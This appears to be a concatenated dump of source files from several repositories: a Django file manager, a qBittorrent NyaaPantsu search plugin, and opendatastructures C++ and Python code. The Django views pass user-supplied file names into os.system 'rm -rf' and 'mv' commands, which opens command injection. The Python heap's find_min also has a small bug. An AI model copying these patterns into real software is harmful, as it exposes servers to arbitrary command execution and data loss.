"text": "import os\n\nfrom django.core.files.uploadedfile import UploadedFile\nfrom django.http import JsonResponse, HttpResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.views import View\n\nfrom common import files_stack, alisms_, file_mime_\nfrom fms import settings\nfrom .models import TUser, TFile, TImageLinks\n\n\ndef send_code(request):\n phone = request.GET.get('phone', '')\n if phone:\n code = cache_.new_code(phone) # 生成新的code\n # 发送验证码短信\n alisms_.send_code(phone, code)\n return JsonResponse({\n 'state': 0,\n 'msg': '发送成功'\n })\n\n return JsonResponse({\n 'state': 1,\n 'msg': '发送失败,请输入正确的手机号'\n })\n\n\nclass RegistView(View):\n def get(self, request):\n return render(request, 'regist.html')\n\n def post(self, request):\n phone = request.POST.get('phone', '')\n code = request.POST.get('code', '')\n password = request.POST.get('password')\n\n if not all((phone, code, password)):\n error = '注册失败,必须输入手机号、验证码和口令!'\n else:\n # 判断输入的验证码是否为向手机端发送的验证码\n if cache_.get_code(phone) != code:\n error = '请输入正确的验证码'\n else:\n user = TUser(phone=phone, auth_string=password)\n user.save()\n\n request.session['login_user'] = {\n '_id': user.user_id,\n 'name': user.phone,\n 'code': '' # 角色的code,不设置但必须是空字符串\n }\n\n return redirect('/')\n\n return render(request, 'regist.html', locals())\n\n\nclass FileView(View):\n def get(self, request):\n user_id = request.session['login_user']['_id'] # 当前会话的用户ID\n\n current_file_id = int(request.GET.get('current_file_id', 0))\n current_file_name = request.GET.get('current_file_name', '根')\n\n if current_file_id == 0:\n files_stack.clear_pre_file_stack(user_id)\n\n files_stack.add_file_stack(user_id, current_file_id, current_file_name)\n\n pre_file_stack = files_stack.get_pre_file_stack(user_id)\n files = TFile.objects.filter(parent_file_id=current_file_id, user_id=user_id)\n return render(request, 'files/list.html', locals())\n\n def update_file_path(self, file_id, old_file_path, new_file_path):\n files = TFile.objects.filter(parent_file_id=file_id)\n\n for file_obj in files.all():\n file_obj.file_path = file_obj.file_path.replace(old_file_path, new_file_path)\n file_obj.save()\n\n self.update_file_path(file_obj.file_id, old_file_path, new_file_path)\n\n def post(self, request):\n print(request.POST)\n\n current_file_id = int(request.POST.get('current_file_id', 0))\n current_file_name = request.POST.get('current_file_name', '')\n\n user_id = request.session['login_user']['_id'] # 当前会话的用户ID\n\n action = request.POST.get('action', '')\n if action and action == 'new_dir':\n save_dir = self.get_dir_path(current_file_id, user_id)\n\n file_name = request.POST.get('dir_name')\n file_path = os.path.join(save_dir, file_name)\n\n file = TFile(file_name=file_name,\n file_path=file_path,\n parent_file_id=current_file_id,\n user_id=user_id)\n file.save()\n os.makedirs(file_path) # 服务器创建目录\n # os.mkdir()\n\n if action and action == 'del':\n # 删除这个文件下的所有子目录和文件\n TFile.objects.filter(parent_file_id=request.POST.get('file_id')).delete()\n file = TFile.objects.get(pk=request.POST.get('file_id'))\n # 服务器的删除文件操作\n os.system(f'rm -rf {os.path.join(file.file_path)}')\n\n file.delete()\n\n if action and action == 'rename':\n file = TFile.objects.get(pk=request.POST.get('file_id'))\n file.file_name = request.POST.get('dir_name', '')\n\n old_file_path = file.file_path # 原目录\n dir_path, _ = os.path.split(file.file_path)\n new_file_path = os.path.join(dir_path, file.file_name)\n\n os.system(f'mv {file.file_path} {new_file_path}') # 
执行服务器的修改文件目录名命令\n\n file.file_path = new_file_path # 更新数据库的新文件路径\n file.save()\n\n if file.file_type == 0:\n # 查询所有的子级目录\n self.update_file_path(file.file_id, old_file_path, new_file_path)\n\n if action and action == 'prefiles':\n current_file_id, current_file_name = files_stack.pop_file_stack(user_id)\n\n if action and action == 'upload':\n print('文件上传')\n\n upload_file: UploadedFile = request.FILES.get('file')\n # 判断当前目录是否为根路径\n save_dir = self.get_dir_path(current_file_id, user_id)\n save_file_path = os.path.join(save_dir, upload_file.name)\n\n TFile.objects.create(file_name=upload_file.name,\n file_type=file_mime_.get_file_type(upload_file.content_type),\n file_path=save_file_path,\n user_id=user_id,\n file_size=upload_file.size,\n parent_file_id=current_file_id)\n\n with open(save_file_path, 'wb') as f:\n for chunk in upload_file.chunks():\n f.write(chunk)\n\n return JsonResponse({\n 'url': '/user/files/?current_file_id=' + str(current_file_id) + \"¤t_file_name=\" + current_file_name\n })\n\n def get_dir_path(self, current_file_id, user_id):\n if not current_file_id:\n save_dir = settings.SAVE_ROOT_PATH + f'-{user_id}'\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n else:\n save_dir = TFile.objects.get(pk=current_file_id).file_path\n return save_dir\n\n\ndef download(request): # 动态资源\n # 下载文件\n from urllib.parse import quote\n\n file_id = request.GET.get('file_id')\n file = TFile.objects.get(pk=file_id)\n with open(file.file_path, 'rb') as f:\n bytes = f.read()\n\n resp = HttpResponse(content=bytes, content_type='application/octet-stream', charset='utf-8')\n\n # 设置响应头\n resp.setdefault('Content-Disposition', 'attachment;filename=' + quote(file.file_name, encoding='utf-8'))\n resp.setdefault('Content-Length', file.file_size)\n\n return resp\n\n\ndef show_img(request):\n file_id = request.GET.get('file_id')\n file = TFile.objects.get(pk=file_id)\n with open(file.file_path, 'rb') as f:\n bytes = f.read()\n\n return HttpResponse(content=bytes, content_type='image/*', charset='utf-8')\n\n\ndef create_image_link(request):\n file_id = request.GET.get('file_id')\n\n return render(request, 'files/edit.html',locals())\n"
},
{
"alpha_fraction": 0.4326923191547394,
"alphanum_fraction": 0.5064102411270142,
"avg_line_length": 15.473684310913086,
"blob_id": "486bba9409592cce797171d6acec04edd154302b",
"content_id": "8d9d102713b6f01caea650896f0471989a1f934c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 360,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 19,
"path": "/common/__init__.py",
"repo_name": "disenQF/fms",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# coding: utf-8\nfrom redis import Redis\n\n\n# decode_responses响应的字节数据直接解码\n# 如: b'123'.decode()\nrd = Redis('47.105.137.19', db=3, decode_responses=True)\n\nfile_types = (\n (0, '目录'),\n (1, '图片'),\n (2, '文本'),\n (3, 'pdf'),\n (4, 'word'),\n (5, 'excel'),\n (6, '压缩包'),\n (7, '其它'),\n)"
}
] | 14 |
kenken28/NyaaPantsu-qBittorrent-Plugin | https://github.com/kenken28/NyaaPantsu-qBittorrent-Plugin | 6dc512fb9824ba23c0441eb27bae8e0b7a939117 | 685fcc57f45876f01586d7af6523ddfcf9779589 | 852940db0031f437d5a964402c876cbe5631c751 | refs/heads/master | 2019-07-10T09:14:33.679237 | 2017-09-19T01:20:29 | 2017-09-19T01:20:29 | 91,229,918 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5558733940124512,
"alphanum_fraction": 0.5601645112037659,
"avg_line_length": 41.96154022216797,
"blob_id": "0e208d1ef06b97d32d21c1a28fdd90f9b1531a9e",
"content_id": "9d6ac67d35930a0c0c91b63c3c093e7b4ba8face",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5593,
"license_type": "permissive",
"max_line_length": 126,
"num_lines": 130,
"path": "/nyaapantsu.py",
"repo_name": "kenken28/NyaaPantsu-qBittorrent-Plugin",
"src_encoding": "UTF-8",
"text": "#VERSION: 1.05\n#AUTHORS: Eugene ([email protected])\n\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# * Neither the name of the author nor the names of its contributors may be\n# used to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\ntry:\n # python3\n from html.parser import HTMLParser\nexcept ImportError:\n # python2\n from HTMLParser import HTMLParser\n\nfrom novaprinter import prettyPrinter\nfrom helpers import retrieve_url, download_file\n\nclass nyaapantsu(object):\n url = 'https://nyaa.pantsu.cat'\n name = 'NyaaPantsu'\n supported_categories = {'all': '0_0', \n 'software': '1_1', \n 'games': '1_2', \n 'music': '2_0', \n 'anime': '3_0', \n 'books': '4_0', \n 'tv': '5_0', \n 'pictures': '6_0'}\n \n class NyaaPantsuParser(HTMLParser):\n def __init__(self, url):\n HTMLParser.__init__(self)\n self.url = url\n self.has_nestPage = False\n self.url_nextPage = None\n self.current_item = None\n self.do_parse = False\n self.do_save_data = None\n self.td_ctr = None\n \n \n def handle_starttag(self, tag, attrs):\n if tag == 'tr':\n self.handle_start_tag_tr(attrs)\n elif tag == 'td':\n self.handle_start_tag_td(attrs)\n elif tag == 'a':\n self.handle_start_tag_a(attrs)\n \n def handle_start_tag_tr(self, attrs):\n tr_attrList = dict(attrs)\n if 'class' in tr_attrList:\n if tr_attrList['class'].startswith('torrent'):\n self.current_item = {\"engine_url\" : self.url}\n self.do_parse = True\n self.td_ctr = 0\n self.current_item['size'] = 'Unkown'\n self.current_item['seeds'] = 'Unkown'\n self.current_item['leech'] = 'Unkown'\n \n def handle_start_tag_td(self, attrs):\n td_attrList = dict(attrs)\n if td_attrList['class'].startswith('tr-size'):\n self.do_save_data = 'size'\n if td_attrList['class'].startswith('tr-se'):\n self.do_save_data = 'seeds'\n if td_attrList['class'].startswith('tr-le'):\n self.do_save_data = 'leech'\n \n def handle_start_tag_a(self, attrs):\n a_attrList = dict(attrs)\n if 'id' in a_attrList:\n if a_attrList['id'] == 'page-next':\n self.has_nestPage = True\n self.url_nextPage = self.url + a_attrList['href'].strip()\n if self.do_parse:\n if a_attrList['href'].startswith('/view'):\n self.current_item['desc_link'] = self.url + a_attrList['href'].strip()\n self.do_save_data = 'name'\n if 
a_attrList['href'].startswith('magnet'):\n self.current_item['link'] = a_attrList['href'].strip()\n \n def handle_data(self, data):\n if self.do_parse:\n if self.do_save_data != None:\n if self.do_save_data not in self.current_item:\n self.current_item[self.do_save_data] = ''\n self.current_item[self.do_save_data] = data.strip()\n self.do_save_data = None\n \n def handle_endtag(self, tag):\n if tag == 'tr' and self.do_parse:\n prettyPrinter(self.current_item)\n self.current_item = None\n self.td_ctr = None\n self.do_parse = False\n \n def download_torrent(self, info):\n print (download_file(info))\n \n def search(self, what, cat='all'):\n searchPage = retrieve_url(self.url + '/search?c=' + self.supported_categories[cat] + '&q=' + what.replace(\"%20\", \"+\"))\n parser = self.NyaaPantsuParser(self.url)\n parser.feed(searchPage)\n parser.close()\n \n while parser.has_nestPage:\n parser.has_nestPage = False\n parser.feed(retrieve_url(parser.url_nextPage))\n parser.close()\n "
},
{
"alpha_fraction": 0.7747641801834106,
"alphanum_fraction": 0.7830188870429993,
"avg_line_length": 59.57143020629883,
"blob_id": "224635fd5568331db7fb0c065c862607c646553c",
"content_id": "4ec4e135c42118b67c93dffbc1fb57a0dcdf58af",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 848,
"license_type": "permissive",
"max_line_length": 396,
"num_lines": 14,
"path": "/README.md",
"repo_name": "kenken28/NyaaPantsu-qBittorrent-Plugin",
"src_encoding": "UTF-8",
"text": "# NyaaPantsu qBittorrent Plugin\nNyaaPantsu search plugin for qBittorrent\n\nThis plugin uses HTMLParser to parse extract torrent from [NyaaPantsu](https://nyaa.pantsu.cat/). It follows the [qBittorrent Plugin documentation](https://github.com/qbittorrent/search-plugins/wiki/How-to-write-a-search-plugin), and is Inspired by [Yukariin](https://github.com/Yukariin)'s [NyaaTorrent plugin](https://github.com/Yukariin/qBittorrent-Search-Plugins/blob/master/nyaatorrents.py).\n\n# Installation\n0. If you don't see a `Search` tab in your qBittorrent window, click on `View` and check the `Search Engine` option\n1. Choose `Search` tab\n2. Click on `Search plugins...` button\n3. Click on `Install a new one`\n4. Locate [`nyaapantsu.py`](https://raw.githubusercontent.com/kenken28/NyaaPantsu-qBittorrent-Plugin/master/nyaapantsu.py) file\n\n# LISENCE\nMIT License\n"
}
] | 2 |
caprianilgithub/data_structures | https://github.com/caprianilgithub/data_structures | c097bfa9d233be367f35f3696179abf8620daf31 | c70569e3fe3ed608fe1add8ed4f07b41b5da3cb8 | 26b190cbaaafeae2089d1a0145b5a2e3b0d6352b | refs/heads/master | 2021-04-06T06:51:49.019045 | 2018-03-13T16:22:52 | 2018-03-13T16:22:52 | 124,398,171 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4452054798603058,
"alphanum_fraction": 0.5,
"avg_line_length": 9.230769157409668,
"blob_id": "b09e5904f4b4faaa84b27dc3f13f7920632b2e42",
"content_id": "7475a074084bd406a0c7a90958b50260bc5cb9e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/Treap.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * Treap.cpp\r\n *\r\n * Created on: 2011-11-28\r\n * Author: morin\r\n */\r\n\r\n#include \"Treap.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.45890411734580994,
"alphanum_fraction": 0.5136986374855042,
"avg_line_length": 10.166666984558105,
"blob_id": "e464e218b604c5fdcad463953d582034bbfd8974",
"content_id": "351b1c902235761be70a754557de7a9d640a9423",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 146,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 12,
"path": "/opendatastructures.org/cpp/SEList.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * SEList.cpp\r\n *\r\n * Created on: 2011-11-25\r\n * Author: morin\r\n */\r\n\r\n#include \"SEList.h\"\r\n\r\nnamespace ods {\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.46710526943206787,
"alphanum_fraction": 0.5197368264198303,
"avg_line_length": 9.692307472229004,
"blob_id": "02136830eb27d3daac15ef05acb2795245006a31",
"content_id": "374e9ff504258b36c827abbbc44c2d6b6af6bda0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/FastSqrt.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * FastSqrt.cpp\r\n *\r\n * Created on: 2011-11-25\r\n * Author: morin\r\n */\r\n\r\n#include \"FastSqrt.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.5100956559181213,
"alphanum_fraction": 0.5324123501777649,
"avg_line_length": 27.841270446777344,
"blob_id": "b182c49ef5d44ef50b0faf5fa3f968c490be1a47",
"content_id": "ca4e0294b51d239edd9a6541923b94f0e3dae124",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1882,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 63,
"path": "/opendatastructures.org/python/ods/meldableheap.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "\"\"\"An implementation of Gambin and Malinowsky's randomized meldable heaps\r\n\r\nA. Gambin and A. Malinowski. Randomized meldable priority queues. \r\n Proceedings of the XXVth Seminar on Current Trends in Theory and Practice\r\n of Informatics (SOFSEM'98), pp. 344-349, 1998\r\n\"\"\"\r\n\r\nimport random\r\nfrom base import BaseSet\r\nfrom binarytree import BinaryTree\r\n\r\ndef random_bit():\r\n return random.getrandbits(1) == 0\r\n\r\nclass MeldableHeap(BinaryTree, BaseSet):\r\n class Node(BinaryTree.Node):\r\n def __init__(self, x):\r\n super(MeldableHeap.Node, self).__init__()\r\n self.x = x\r\n \r\n def __init__(self, iterable=[]):\r\n super(MeldableHeap, self).__init__()\r\n self.n = 0\r\n \r\n def _new_node(self, x):\r\n return MeldableHeap.Node(x)\r\n \r\n def find_min(self):\r\n if n == 0: raise IndexError('find_min on empty queue')\r\n return self.r.x\r\n\r\n def add(self, x):\r\n u = self._new_node(x)\r\n self.r = self.merge(u, self.r)\r\n self.r.parent = self.nil\r\n self.n += 1\r\n return True\r\n \r\n def remove(self):\r\n if self.n == 0: raise IndexError('remove from empty heap')\r\n x = self.r.x\r\n self.r = self.merge(self.r.left, self.r.right)\r\n if self.r != self.nil: self.r.parent = self.nil\r\n self.n -= 1\r\n return x\r\n \r\n def merge(self, h1, h2):\r\n if h1 == self.nil: return h2\r\n if h2 == self.nil: return h1\r\n if h2.x < h1.x: (h1, h2) = (h2, h1)\r\n if random_bit():\r\n h1.left = self.merge(h1.left, h2)\r\n h1.left.parent = h1\r\n else:\r\n h1.right = self.merge(h1.right, h2)\r\n h1.right.parent = h1\r\n return h1\r\n \r\n def __iter__(self):\r\n u = self.first_node()\r\n while u != self.nil:\r\n yield u.x\r\n u = self.next_node(u)\r\n\r\n"
},
{
"alpha_fraction": 0.6985294222831726,
"alphanum_fraction": 0.6985294222831726,
"avg_line_length": 17.14285659790039,
"blob_id": "28014c2fc82baee19e6f395b1ff16db74275d531",
"content_id": "2220abd9356a2ab78fe6f8948def5e388bd0f369",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 136,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/opendatastructures.org/python/ods/tests/test_redblacktree.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "from nose.tools import *\r\n\r\nimport ods\r\nfrom ssettest import exercise_sset\r\n\r\ndef test_rbt():\r\n exercise_sset(ods.RedBlackTree())\r\n\r\n"
},
{
"alpha_fraction": 0.48076921701431274,
"alphanum_fraction": 0.5320512652397156,
"avg_line_length": 10,
"blob_id": "a423c30ff1c352ccd5093ca811914e556dad9b16",
"content_id": "b146fc2a150e388b654870c12c8a5bad4bf61aa8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/BinaryTrie.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BinaryTrie.cpp\r\n *\r\n * Created on: 2012-01-26\r\n * Author: morin\r\n */\r\n\r\n#include \"BinaryTrie.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.47413793206214905,
"alphanum_fraction": 0.5431034564971924,
"avg_line_length": 12.25,
"blob_id": "19b446f7bdf411e4ab694049197ebad539d4e663",
"content_id": "474e7e8838020dea249d6b44578bb3ccde9fea25",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 8,
"path": "/opendatastructures.org/cpp/SkiplistSSet.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * SkiplistSSet.cpp\r\n *\r\n * Created on: 2011-11-28\r\n * Author: morin\r\n */\r\n\r\n#include \"SkiplistSSet.h\"\r\n\r\n"
},
{
"alpha_fraction": 0.6842105388641357,
"alphanum_fraction": 0.6842105388641357,
"avg_line_length": 16.25,
"blob_id": "ebc9dc446a425e7d4312fa7dd7d091c89596c119",
"content_id": "6436fe0a16eb881c06e4cbffc020c408be864d49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 8,
"path": "/opendatastructures.org/python/ods/tests/test_arraystack.py",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "import random\r\n\r\nfrom nose.tools import *\r\nimport ods\r\nfrom listtest import exercise_list\r\n\r\ndef test_as():\r\n exercise_list(ods.ArrayStack())\r\n \r\n"
},
{
"alpha_fraction": 0.48076921701431274,
"alphanum_fraction": 0.5320512652397156,
"avg_line_length": 10,
"blob_id": "6a25acdf192a2f2c65d1ce98ed54456efc1bc0bd",
"content_id": "18979914ee95fab7f45eb973c2eef17b5d98cf13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 13,
"path": "/opendatastructures.org/cpp/BlockStore.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * BlockStore.cpp\r\n *\r\n * Created on: 2013-07-03\r\n * Author: morin\r\n */\r\n\r\n#include \"BlockStore.h\"\r\n\r\nnamespace ods {\r\n\r\n\r\n} /* namespace ods */\r\n"
},
{
"alpha_fraction": 0.2911853790283203,
"alphanum_fraction": 0.7117024064064026,
"avg_line_length": 11.984615325927734,
"blob_id": "86a39df8961e463611f1d9b29d72c500010c27dc",
"content_id": "7c6672e3081fa747a42ef930f091a4a4ddab276f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 14544,
"license_type": "no_license",
"max_line_length": 28,
"num_lines": 1040,
"path": "/opendatastructures.org/cpp/LinearHashTable.cpp",
"repo_name": "caprianilgithub/data_structures",
"src_encoding": "UTF-8",
"text": "/*\r\n * LinearHashTable.cpp\r\n *\r\n * Created on: 2011-12-16\r\n * Author: morin\r\n */\r\n\r\n#include \"LinearHashTable.h\"\r\n\r\nnamespace ods {\r\n\r\nunsigned int tab[4][256] =\r\n\t{{0x0069aeff,\r\n\t0x6ac0719e,\r\n\t0x384cd7ee,\r\n\t0xcba78313,\r\n\t0x133ef89a,\r\n\t0xb37979e6,\r\n\t0xa4c4e09c,\r\n\t0x911c738b,\r\n\t0xc7fe9194,\r\n\t0xba8e5dc7,\r\n\t0xe610718c,\r\n\t0x48460ac5,\r\n\t0x6b4d9d43,\r\n\t0x73afeeab,\r\n\t0x051264cb,\r\n\t0x4b3dba93,\r\n\t0x28837665,\r\n\t0xfb80a52b,\r\n\t0xad1c14af,\r\n\t0xb2baf17f,\r\n\t0x35e311a5,\r\n\t0xf7fa2905,\r\n\t0xa973c315,\r\n\t0x00885f47,\r\n\t0x8842622b,\r\n\t0x0445a92c,\r\n\t0x701ba3a0,\r\n\t0xef608902,\r\n\t0x176099ad,\r\n\t0xd240f938,\r\n\t0xb32d83c6,\r\n\t0xb341afb8,\r\n\t0xc3a978fb,\r\n\t0x55ed1f0c,\r\n\t0xb581286e,\r\n\t0x8ff6938e,\r\n\t0x9f11c1c5,\r\n\t0x4d083bd6,\r\n\t0x1aacc2a4,\r\n\t0xdf13f00a,\r\n\t0x1e282712,\r\n\t0x772d354b,\r\n\t0x21e3a7fd,\r\n\t0x4bc932dc,\r\n\t0xe1deb7ba,\r\n\t0x5e868b8a,\r\n\t0xc9331cc6,\r\n\t0xaa931bbf,\r\n\t0xff92aba6,\r\n\t0xe3efc69f,\r\n\t0xda3b8e2a,\r\n\t0xf9b21ec1,\r\n\t0x2fb89674,\r\n\t0x61c87462,\r\n\t0xa553c2f9,\r\n\t0xca01e279,\r\n\t0x35999337,\r\n\t0xf44c4fd3,\r\n\t0x136a2773,\r\n\t0x812607a8,\r\n\t0xbfcd9bbf,\r\n\t0x0b1d15cd,\r\n\t0xc2a0038b,\r\n\t0x029ab4f7,\r\n\t0xcd7c58f9,\r\n\t0xed3821c4,\r\n\t0x325457c6,\r\n\t0x1dc6b295,\r\n\t0x876dcb83,\r\n\t0x52df45fc,\r\n\t0xa01c9fba,\r\n\t0xc938ff66,\r\n\t0x19e52c87,\r\n\t0x03ae67f9,\r\n\t0x7db39e51,\r\n\t0x74f31686,\r\n\t0x5f10e5a3,\r\n\t0x74108d8a,\r\n\t0x64e63104,\r\n\t0xd86a38d6,\r\n\t0x65be2fbb,\r\n\t0xef06049e,\r\n\t0x9bca1dbd,\r\n\t0x06c63e73,\r\n\t0xe97bd103,\r\n\t0xfed3c22c,\r\n\t0x09d10fc6,\r\n\t0xb92633a3,\r\n\t0x21378ebf,\r\n\t0xe37fa54e,\r\n\t0x893c7910,\r\n\t0xc1c74a5a,\r\n\t0x6c23c029,\r\n\t0x4d4b6187,\r\n\t0xd72bb8fb,\r\n\t0x0dbe1118,\r\n\t0x5e0f4188,\r\n\t0xce0d2dc8,\r\n\t0x8dd83231,\r\n\t0x0466ab90,\r\n\t0x814bc11a,\r\n\t0xef688b9b,\r\n\t0x0a03c851,\r\n\t0xca3c984f,\r\n\t0x6df87ca4,\r\n\t0x6b34d1b2,\r\n\t0x2bad5c75,\r\n\t0xaed1b6d8,\r\n\t0x8c73f8b4,\r\n\t0x4577d798,\r\n\t0x5c953767,\r\n\t0xe7da2d51,\r\n\t0x2b9279a0,\r\n\t0x418d9b51,\r\n\t0x8c47ec3d,\r\n\t0x894e6119,\r\n\t0xa0ca769d,\r\n\t0x1c3b16a4,\r\n\t0xa1621b5b,\r\n\t0xa695da53,\r\n\t0x22462819,\r\n\t0xf4b878cf,\r\n\t0x72b4d648,\r\n\t0x1faf4267,\r\n\t0x4ba16750,\r\n\t0x08a9d645,\r\n\t0x6bfb829c,\r\n\t0xe051295f,\r\n\t0x6dd5cd97,\r\n\t0x2e9d1baf,\r\n\t0x6ed6231d,\r\n\t0x6f84cb25,\r\n\t0x9ae60c95,\r\n\t0xbcee55ca,\r\n\t0x6831cd97,\r\n\t0x2ccdbc99,\r\n\t0x9f8a0a81,\r\n\t0xa0b2c08f,\r\n\t0xe957c36b,\r\n\t0x9cb797b5,\r\n\t0x107c6362,\r\n\t0x48dacf5d,\r\n\t0x6e16f569,\r\n\t0x39be78c3,\r\n\t0x6445637f,\r\n\t0xed445ee5,\r\n\t0x8ec45004,\r\n\t0x9ef8a405,\r\n\t0xb5796a45,\r\n\t0x049d5143,\r\n\t0xb3c1d852,\r\n\t0xc36d9b44,\r\n\t0xab0da981,\r\n\t0xff5226b3,\r\n\t0x19169b4c,\r\n\t0x9a49194d,\r\n\t0xba218b42,\r\n\t0xab98c8ee,\r\n\t0x4db02645,\r\n\t0x6faca3c8,\r\n\t0x12c60d2d,\r\n\t0xaf67b750,\r\n\t0xf0f6a855,\r\n\t0xead566d9,\r\n\t0x42d0cccd,\r\n\t0x76a532bb,\r\n\t0x82a6dc35,\r\n\t0xc1c23d0e,\r\n\t0x83d45bd2,\r\n\t0xd7024912,\r\n\t0x97888901,\r\n\t0x2b7cdd2c,\r\n\t0x523742a5,\r\n\t0xecb96b3b,\r\n\t0xd800d833,\r\n\t0x7b4d0c91,\r\n\t0x95c7dd86,\r\n\t0x88880aad,\r\n\t0xf0ce0990,\r\n\t0x7e292a90,\r\n\t0x79ac4437,\r\n\t0x8a9f59cc,\r\n\t0x818444d1,\r\n\t0xae4e735d,\r\n\t0xa529db95,\r\n\t0x58b35661,\r\n\t0xa909a7de,\r\n\t0x9273beaa,\r\n\t0xfe94332c,\r\n\t0x259b88e4,\r\n\t0xc88f4f6a,\r\n\t0x2a9d33ef,\r\n\t0x4b5d106d,\r\n\t0xdc3a9fca,\r\n\t0xa8061cad,\r\n\t0x7679422c,\r\n\t0xaf72ad02,\r\n\t0xc5
799ea5,\r\n\t0x306d694d,\r\n\t0x620aad10,\r\n\t0xd188b9dd,\r\n\t0xeff6ad87,\r\n\t0x6b890354,\r\n\t0xb5907cd3,\r\n\t0x733290fc,\r\n\t0x4b6c0733,\r\n\t0x0bad0ebd,\r\n\t0xa049d3ad,\r\n\t0xc9d0cdae,\r\n\t0x9c144d6f,\r\n\t0x5990b63b,\r\n\t0xfa33d8e2,\r\n\t0x9ebeb5a0,\r\n\t0xbc7c5c92,\r\n\t0xd3edd2e6,\r\n\t0x54ae1af6,\r\n\t0xd6ada4bd,\r\n\t0x14094c5a,\r\n\t0x0e3c5adf,\r\n\t0xf1ab60f1,\r\n\t0x74456a66,\r\n\t0x0f3a675a,\r\n\t0x87445d0d,\r\n\t0xa81adc2e,\r\n\t0x0f47a1a5,\r\n\t0x4eedb844,\r\n\t0x9c9cb0ce,\r\n\t0x8bb3d330,\r\n\t0x02df93e6,\r\n\t0x86e3ad51,\r\n\t0x1c1072b9,\r\n\t0xacf3001b,\r\n\t0xbd08c487,\r\n\t0xc2667a11,\r\n\t0xdd5ef664,\r\n\t0xd47b67fb,\r\n\t0x959cca45,\r\n\t0xa7da8e68,\r\n\t0xb75b1e18,\r\n\t0x75201924,\r\n\t0xe689ab8b,\r\n\t0x0f5e6b0a,\r\n\t0x75205923,\r\n\t0xbba35593,\r\n\t0xd24dab24,\r\n\t0x0288caeb,\r\n\t0xcbf022a